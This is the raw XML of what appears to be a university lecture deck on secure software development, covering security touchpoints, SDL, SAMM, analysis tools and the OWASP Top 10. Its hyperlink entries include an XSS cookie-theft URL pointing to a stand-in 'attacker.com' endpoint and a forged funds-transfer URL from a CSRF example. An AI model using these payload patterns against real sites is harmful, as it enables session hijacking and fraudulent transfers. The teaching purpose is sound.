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57c81ba6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57c81ba6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57c81ba6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57c81ba6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57c81ba6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57c81ba6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57c81ba6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7c81ba6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cabf84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cabf84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57c81ba69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57c81ba69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35b9da8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35b9da8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35b9da83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35b9da83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35b9da8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35b9da8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35b9da83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35b9da83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6ac463ef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6ac463ef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5b4f64a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5b4f64a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57c81ba69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57c81ba69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57c81ba69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57c81ba69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57c81ba69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57c81ba69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57c81ba69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57c81ba69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57c81ba69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57c81ba6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57c81ba69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57c81ba69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8f46b464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8f46b464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8f46b464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8f46b464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8ab0bddf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8ab0bddf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6ac463efa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6ac463efa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57c81ba69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57c81ba69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57c81ba69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57c81ba69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757c81ba6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57c81ba6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8f46b464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8f46b464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8f46b464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8f46b464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88f46b464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8f46b464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8f46b464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8f46b464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1f81fc4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1f81fc4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51f81fc45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51f81fc45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88f46b464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8f46b464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8f46b46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8f46b46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57c81ba69_0_537:notes"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="685787" y="4343386"/>
            <a:ext cx="5486400" cy="4114800"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="ctr" bIns="81475" lIns="81475" spcFirstLastPara="1" rIns="81475" wrap="square" tIns="81475">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="320" name="Google Shape;320;g757c81ba69_0_537:notes"/>
          <p:cNvSpPr/>
          <p:nvPr>
            <p:ph idx="2" type="sldImg"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="381504"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757c81ba69_0_542:notes"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="685787" y="4343386"/>
            <a:ext cx="5486400" cy="4114800"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="ctr" bIns="81475" lIns="81475" spcFirstLastPara="1" rIns="81475" wrap="square" tIns="81475">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="326" name="Google Shape;326;g757c81ba69_0_542:notes"/>
          <p:cNvSpPr/>
          <p:nvPr>
            <p:ph idx="2" type="sldImg"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="381504"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757c81ba69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57c81ba69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757c81ba69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57c81ba69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57c81ba69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57c81ba69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57c81ba69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57c81ba69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757c81ba69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57c81ba69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757c81ba69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57c81ba69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5b4f64acc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a5b4f64ac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88f46b464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88f46b464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8f46b46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8f46b46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88f46b464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88f46b464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6ac463e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6ac463e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57c81ba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57c81ba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57c81ba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57c81ba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57c81ba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57c81ba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57c81ba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57c81ba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172" y="205014"/>
            <a:ext cx="8228700" cy="858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2800"/>
              <a:buNone/>
              <a:defRPr b="0" i="0" sz="1500" u="none" cap="none" strike="noStrike"/>
            </a:lvl1pPr>
            <a:lvl2pPr indent="0" lvl="1" marL="0" marR="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="2800"/>
              <a:buNone/>
              <a:defRPr b="0" i="0" sz="1500" u="none" cap="none" strike="noStrike"/>
            </a:lvl2pPr>
            <a:lvl3pPr indent="0" lvl="2" marL="0" marR="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="2800"/>
              <a:buNone/>
              <a:defRPr b="0" i="0" sz="1500" u="none" cap="none" strike="noStrike"/>
            </a:lvl3pPr>
            <a:lvl4pPr indent="0" lvl="3" marL="0" marR="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="2800"/>
              <a:buNone/>
              <a:defRPr b="0" i="0" sz="1500" u="none" cap="none" strike="noStrike"/>
            </a:lvl4pPr>
            <a:lvl5pPr indent="0" lvl="4" marL="0" marR="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="2800"/>
              <a:buNone/>
              <a:defRPr b="0" i="0" sz="1500" u="none" cap="none" strike="noStrike"/>
            </a:lvl5pPr>
            <a:lvl6pPr indent="0" lvl="5" marL="0" marR="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="2800"/>
              <a:buNone/>
              <a:defRPr b="0" i="0" sz="1500" u="none" cap="none" strike="noStrike"/>
            </a:lvl6pPr>
            <a:lvl7pPr indent="0" lvl="6" marL="0" marR="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="2800"/>
              <a:buNone/>
              <a:defRPr b="0" i="0" sz="1500" u="none" cap="none" strike="noStrike"/>
            </a:lvl7pPr>
            <a:lvl8pPr indent="0" lvl="7" marL="0" marR="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="2800"/>
              <a:buNone/>
              <a:defRPr b="0" i="0" sz="1500" u="none" cap="none" strike="noStrike"/>
            </a:lvl8pPr>
            <a:lvl9pPr indent="0" lvl="8" marL="0" marR="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="2800"/>
              <a:buNone/>
              <a:defRPr b="0" i="0" sz="1500" u="none" cap="none" strike="noStrike"/>
            </a:lvl9pPr>
          </a:lstStyle>
          <a:p/>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="52" name="Google Shape;52;p13"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457172" y="1203631"/>
            <a:ext cx="8228700" cy="339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800"/>
              <a:buNone/>
              <a:defRPr b="0" i="0" sz="1500" u="none" cap="none" strike="noStrike"/>
            </a:lvl1pPr>
            <a:lvl2pPr indent="-228600" lvl="1" marL="914400" marR="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="1600"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1400"/>
              <a:buNone/>
              <a:defRPr b="0" i="0" sz="1500" u="none" cap="none" strike="noStrike"/>
            </a:lvl2pPr>
            <a:lvl3pPr indent="-228600" lvl="2" marL="1371600" marR="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="1600"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1400"/>
              <a:buNone/>
              <a:defRPr b="0" i="0" sz="1500" u="none" cap="none" strike="noStrike"/>
            </a:lvl3pPr>
            <a:lvl4pPr indent="-228600" lvl="3" marL="1828800" marR="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="1600"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1400"/>
              <a:buNone/>
              <a:defRPr b="0" i="0" sz="1500" u="none" cap="none" strike="noStrike"/>
            </a:lvl4pPr>
            <a:lvl5pPr indent="-228600" lvl="4" marL="2286000" marR="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="1600"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1400"/>
              <a:buNone/>
              <a:defRPr b="0" i="0" sz="1500" u="none" cap="none" strike="noStrike"/>
            </a:lvl5pPr>
            <a:lvl6pPr indent="-228600" lvl="5" marL="2743200" marR="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="1600"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1400"/>
              <a:buNone/>
              <a:defRPr b="0" i="0" sz="1500" u="none" cap="none" strike="noStrike"/>
            </a:lvl6pPr>
            <a:lvl7pPr indent="-228600" lvl="6" marL="3200400" marR="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="1600"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1400"/>
              <a:buNone/>
              <a:defRPr b="0" i="0" sz="1500" u="none" cap="none" strike="noStrike"/>
            </a:lvl7pPr>
            <a:lvl8pPr indent="-228600" lvl="7" marL="3657600" marR="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="1600"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1400"/>
              <a:buNone/>
              <a:defRPr b="0" i="0" sz="1500" u="none" cap="none" strike="noStrike"/>
            </a:lvl8pPr>
            <a:lvl9pPr indent="-228600" lvl="8" marL="4114800" marR="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="1600"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="1600"/>
              </a:spcAft>
              <a:buSzPts val="1400"/>
              <a:buNone/>
              <a:defRPr b="0" i="0" sz="15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microsoft.com/en-us/securityenginee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hyperlink" Target="https://www.microsoft.com/en-us/securityengineering/osa/practic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owasp.org/index.php/OWASP_SAMM_Project" TargetMode="External"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/OWASP/sam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owaspsamm.org/" TargetMode="External"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/OWASP/samm/blob/master/Supporting%20Resources/v2.0/OWASP-SAMM-v2.0.pdf" TargetMode="External"/><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microsoft.com/en-us/securityengineering/sdl/threatmodeling" TargetMode="External"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://owasp.org/www-project-threat-drag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sourcemaking.com/refactoring/smell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owasp.org/www-pdf-archive/OWASP_SCP_Quick_Reference_Guide_v2.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1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.sonarqube.org/" TargetMode="External"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://pmd.github.io/" TargetMode="External"/><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github.com/Microsoft/DevSkim" TargetMode="External"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://developer.android.com/studio/write/lint" TargetMode="External"/><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://jslint.com/" TargetMode="External"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://findbugs.sourceforge.net/" TargetMode="External"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://spotbugs.github.io/" TargetMode="External"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://find-sec-bugs.github.io/" TargetMode="External"/><Relationship Id="rId8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.pylint.or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onlinecampus.bu.edu/bbcswebdav/pid-7397653-dt-content-rid-33742778_1/courses/20sum1metcs673so1/course/module6/ZAP%20https://www.zaproxy.org/" TargetMode="External"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.arachni-scanner.com/" TargetMode="External"/><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.hacker101.com/playlists/web_hacking" TargetMode="External"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://portswigger.net/burp" TargetMode="External"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.rapid7.com/products/appspider/" TargetMode="External"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.netsparker.com/" TargetMode="External"/><Relationship Id="rId8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.acunetix.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6.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github.com/OWASP/DevSecOpsGuideline" TargetMode="External"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.youtube.com/watch?v=_m5KYEi1ThA&amp;list=PLrsbMazVPK_pt9u_PiTGAb3s9aw8ashvQ&amp;index=2" TargetMode="External"/><Relationship Id="rId5"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cwe.mitre.org/" TargetMode="External"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://cwe.mitre.org/data/index.html" TargetMode="External"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://cwe.mitre.org/top25/index.html" TargetMode="External"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://owasp.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hyperlink" Target="https://www.owasp.org/images/7/72/OWASP_Top_10-2017_%28en%29.pdf.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hyperlink" Target="https://www.owasp.org/index.php/Projects/OWASP_Mobile_Security_Project_-_Top_Ten_Mobile_Risk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example.com/sale/saleitems;jsessionid=2P0OC2JSNDLPSKHCJUN2JV?dest=Hawaii"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www.owasp.org/images/6/67/OWASPApplicationSecurityVerificationStandard3.0.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www.attacker.com/cgi-bin/cookie.cgi?foo=" TargetMode="External"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://excess-xss.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example.com/app/transferFunds?amount=1500&amp;destinationAccount=attackersAcct#" TargetMode="External"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://example.com/app/transferFunds?amount=1500&amp;destinationAccount=attackersAcct#" TargetMode="External"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://example.com/app/transferFunds?amount=1500&amp;destinationAccount=attackersAc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2.ed.gov/ferpa#:~:text=The%20Family%20Educational%20Rights%20and,privacy%20of%20student%20education%20records.&amp;text=Parents%20or%20eligible%20students%20have%20the%20right%20to%20request%20that,to%20be%20inaccurate%20or%20misleadin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schneier.com/blog/archives/2019/07/software_develo.html" TargetMode="External"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.schneier.com/blog/archives/2019/07/software_develo.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781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CS673 Software Engineering</a:t>
            </a:r>
            <a:endParaRPr sz="4800"/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="ctr">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr sz="4800"/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="ctr">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="3600"/>
              <a:t>Module 6 Secure Software Development</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="3600"/>
              <a:t> </a:t>
            </a:r>
            <a:endParaRPr sz="3600"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="58" name="Google Shape;58;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Yuting Zhang </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en"/>
            </a:br>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>BU METCS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Security</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="116" name="Google Shape;116;p23"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="321475" y="848500"/>
            <a:ext cx="3119400" cy="37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areas:</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="1600"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Software engineering</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="1600"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Programming language</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="1600"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="1600"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Security engineering</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="117" name="Google Shape;117;p23"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="3714775" y="1291363"/>
            <a:ext cx="5238750" cy="3200400"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="118" name="Google Shape;118;p23"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1306875" y="4568800"/>
            <a:ext cx="5362200" cy="30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Gary McGraw, “Software Security, Building Security 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Secure Software Development Process Model</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="124" name="Google Shape;124;p24"/>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Security should be considered in all activities in the DevOps lifecycle.</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-342900" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1800"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Examples:</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-342900" lvl="1" marL="914400" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1800"/>
              <a:buChar char="○"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Touchpoints ( BSIMM from Cigital )</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-342900" lvl="1" marL="914400" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1800"/>
              <a:buChar char="○"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Microsoft SDL</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-342900" lvl="1" marL="914400" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1800"/>
              <a:buChar char="○"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>OWASP SAMM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Seven Touchpoints</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="130" name="Google Shape;130;p25"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5595575" y="848500"/>
            <a:ext cx="3769200" cy="37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iterative approach</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="1600"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>In the order of effectiveness </a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-342900" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="1600"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="FF0000"/>
              </a:buClr>
              <a:buSzPts val="1800"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1800">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Code review</a:t>
            </a:r>
            <a:endParaRPr sz="1800">
              <a:solidFill>
                <a:srgbClr val="FF0000"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="-342900" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="FF0000"/>
              </a:buClr>
              <a:buSzPts val="1800"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1800">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Architectural risk analysis</a:t>
            </a:r>
            <a:endParaRPr sz="1800">
              <a:solidFill>
                <a:srgbClr val="FF0000"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="-342900" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1800"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1800"/>
              <a:t>Penetration testing</a:t>
            </a:r>
            <a:endParaRPr sz="1800"/>
          </a:p>
          <a:p>
            <a:pPr indent="-342900" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1800"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1800"/>
              <a:t>Risk-based security tests</a:t>
            </a:r>
            <a:endParaRPr sz="1800"/>
          </a:p>
          <a:p>
            <a:pPr indent="-342900" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1800"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1800"/>
              <a:t>Abuse cases</a:t>
            </a:r>
            <a:endParaRPr sz="1800"/>
          </a:p>
          <a:p>
            <a:pPr indent="-342900" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1800"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1800"/>
              <a:t>Security Requirements</a:t>
            </a:r>
            <a:endParaRPr sz="1800"/>
          </a:p>
          <a:p>
            <a:pPr indent="-342900" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1800"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1800"/>
              <a:t>Security operations</a:t>
            </a:r>
            <a:endParaRPr sz="1800"/>
          </a:p>
          <a:p>
            <a:pPr indent="457200" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="1600"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1800"/>
              <a:t>External Analysis</a:t>
            </a:r>
            <a:endParaRPr sz="1800"/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="1600"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="1600"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr sz="1800"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="131" name="Google Shape;131;p25"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="73075" y="848500"/>
            <a:ext cx="5303250" cy="3190875"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="132" name="Google Shape;132;p25"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2232750" y="4023500"/>
            <a:ext cx="4359900" cy="41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Figure 1-9 on [McGraw, 2010]P28</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="133" name="Google Shape;133;p25"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="952500" y="3676700"/>
            <a:ext cx="1059600" cy="572700"/>
          </a:xfrm>
          <a:prstGeom prst="wedgeRectCallout">
            <a:avLst>
